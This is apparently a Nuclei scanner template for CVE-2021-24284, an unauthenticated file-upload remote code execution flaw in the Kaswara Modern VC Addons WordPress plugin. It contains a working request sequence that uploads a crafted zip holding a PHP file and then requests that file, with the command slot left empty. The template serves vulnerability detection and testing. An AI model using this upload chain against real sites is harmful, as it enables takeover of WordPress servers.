id: CVE-2021-24284 info: name: WordPress Kaswara Modern VC Addons - File Upload RCE author: lamscun,pussycat0x,pdteam severity: critical description: | The Kaswara Modern VC Addons WordPress plugin through 3.0.1 allows unauthenticated arbitrary file upload via the 'uploadFontIcon' AJAX action. The supplied zipfile being unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP. reference: - https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5 - https://github.com/advisories/GHSA-wqvg-8q49-hjc7 - https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/ - https://www.waltermairena.net/en/2021/04/25/0-day-vulnerability-in-the-plugin-kaswara-modern-vc-addons-plugin-what-can-i-do/ - https://lifeinhex.com/kaswara-exploit-or-how-much-wordfence-cares-about-user-security/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24284 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24284 cwe-id: CWE-434 tags: cve,cve2021,wordpress,wp-plugin,rce,wp,intrusive,unauth,fileupload variables: zip_file: "{{to_lower(rand_text_alpha(6))}}" php_file: "{{to_lower(rand_text_alpha(2))}}.php" php_cmd: "" requests: - raw: - | POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=------------------------d3be34324392a708 --------------------------d3be34324392a708 Content-Disposition: form-data; name="fonticonzipfile"; filename="{{zip_file}}.zip" Content-Type: application/octet-stream {{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}} --------------------------d3be34324392a708 Content-Disposition: form-data; name="fontsetname" {{zip_file}} --------------------------d3be34324392a708 Content-Disposition: form-data; name="action" uploadFontIcon --------------------------d3be34324392a708-- - | GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1 Host: {{Hostname}} req-condition: true matchers-condition: and matchers: - type: word part: body_1 words: - "wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css" - type: word part: body_2 words: - "phpinfo()" - type: status status: - 200